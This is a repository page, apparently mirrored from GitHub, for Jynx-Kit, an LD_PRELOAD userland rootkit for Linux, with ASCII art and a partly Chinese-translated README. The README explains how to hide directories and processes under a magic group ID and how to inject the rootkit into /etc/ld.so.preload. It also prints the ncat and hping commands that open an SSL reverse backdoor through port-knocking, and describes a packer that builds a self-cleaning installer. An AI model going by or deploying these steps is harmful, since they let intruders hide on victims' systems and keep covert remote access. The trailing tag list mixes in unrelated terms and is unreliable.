chokepoint/jynxkit
GitHub: chokepoint/jynxkit
基于 LD_PRELOAD 技术的 Linux 用户态 Rootkit,具备文件进程隐藏和 SSL 加密反向后门功能。
Stars: 60 | Forks: 32
```
_ _,.-.' .-.
_ .' |,' ."".| |.""._
( || ,',"". `._`' ` ' `.
`\ | `" .-"`-..` . `.
| `..--.._ | \
_,| _...'_.' ,+. `.
,""'| `...-'..""(__.._ -" `"--.. `.
|`._,' ,' /\ .'""` .'""`. `. | `. \
' / / / || || |.`.`. . | \
`.__,'-._' /|` -"' `-.' \ \ \ `"-' \
' `. / /_| | |'""| | .-""'`'"`-,.-"\ .
. / .\ . / | | `._.' || ,' \ \
' / / |/ /_.-+._`-..--"-. . . \ `
```
/ /.' ' ,'""'-. `"."'""'`.. |. \ \
/ . | j . . | |\__," |. ` ' \
. | | | | ' | '| | ' ` \ \ .
| | | `.____,' ..____,' | | . \
| | | | ._ _..---._ _,' | . '
| | | | | "" . |`"' \ `.| ' ' ' .
| | | | | | | ` ` . . \ |
| | | | | ' | \ `. | | . |
' ' | | | . ` \ \ | | | |
\ ` | | | . `. | | | |
\ \ ' | ` ' ` `+..|___|___|_........
\ \ \| ' . `. `. |
`. \ . . ` `. `-. .'
_,'`. \' . \ `-.._ `._ ,'
_." `._ `.` | . `._ .
`._ _,`"--`. | . `. |
`-._ ,' | `. `|_
,' | | `. `.
.' __...__.| | \ __..._ _,..,.__ `.
`-`"' `._..--'-.__ .' `-..' ``'"--..-'
`"---'
```
/$$$$$ /$$ /$$ /$$ /$$
```
|__ $$ | $$ /$$/|__/ | $$
| $$ /$$ /$$ /$$$$$$$ /$$ /$$ | $$ /$$/ /$$ /$$$$$$
| $$| $$ | $$| $$__ $$| $$ /$$//$$$$$$| $$$$$/ | $$|_ $$_/
/$$ | $$| $$ | $$| $$ \ $$ \ $$$$/|______/| $$ $$ | $$ | $$
| $$ | $$| $$ | $$| $$ | $$ >$$ $$ | $$\ $$ | $$ | $$ /$$
| $$$$$$/| $$$$$$$| $$ | $$ /$$/\ $$ | $$ \ $$| $$ | $$$$/
\______/ \____ $$|__/ |__/|__/ \__/ |__/ \__/|__/ \___/
/$$ | $$
| $$$$$$/
\______/
```
BlackHatAcademy.org
ErrProne / XO
```
文件列表:bc.c config.h ld_poison.so Makefile packer.sh README
0x01. 设置 config.h。
```
First of all, you need to dig into config.h, and ensure that the settings meet your needs.
```
MAGIC_DIR 应更改为您希望对系统隐藏的目录名称。这也可以用作主目录的前缀以及文件的前缀。MAGIC_GID 将是用于隐藏的 Group ID。请确保您将 MAGIC_DIR 的 Group ID 设置为 MAGIC_GID 以便进行隐藏。这将有助于向系统隐藏进程,包括像 ps 这样的命令。CONFIG_FILE 默认为 ld.so.preload,通常位于 /etc 中。除非您打算更深入地隐藏 Jynx-Kit,否则不必更改此设置。MAGIC_ACK 和 MAGIC_SEQ 均用作反向连接的端口敲门序列。反向连接程序会自动将 GID 设置为 MAGIC_GID,因此无需担心此问题。您将使用像 hping 这样的程序发起反向连接,以根据需要操作数据包。
# ncat --ssl -l -p 31337 # 设置 ssl 监听器
# hping localhost -s 31337 -M -L -c 1 # 使反向连接回连
0x02. 配置 Makefile 和安装。
```
Once you have this configured, go ahead and open up Makefile. Make sure that MAGIC_GID
```
与您在 config.h 中的设置一致。INSTALL 应设置为要隐藏文件的目录。您也可以在调用“make install”时设置这些变量。请参阅下面的示例。
# make all # 编译 bc 和 ld_poison.so
# make install # 安装 bc 和 ld_poison,注入到 ld preload,并设置正确的 GID
# make install INSTALL=/omgxochi MAGIC_GID=100
```
The last line installs the kid to /omgxochi, and sets the GID to 100. You should use GID
```
对于您打算运行且需要向系统隐藏的任何内容,其 GID 均为 100。
0x03. packer.sh
现在您已完成所有配置并且编译正确,您可以使用 packer.sh 为将来的安装创建一个自动安装 shell 脚本。只需编辑 INSTALL_FILE 和 FILES 变量(如果您添加或删除了 Jynx-Kit 最初附带的任何文件)。默认情况下,packer.sh 会创建 install.sh,该脚本可在任何系统上运行,它会解压源文件,编译它们,将它们安装到定义的隐藏目录中,然后清理所有文件。
标签:Backdoor, CSV导出, Cutter, LD_PRELOAD, Reverse Shell, Rootkit, SSL, Userland Rootkit, Zeek, 内存劫持, 动态链接库劫持, 协议分析, 子域名枚举, 客户端加密, 客户端加密, 恶意软件, 权限提升, 私有化部署, 系统安全, 网络安全, 防御规避, 隐私保护, 隐蔽通信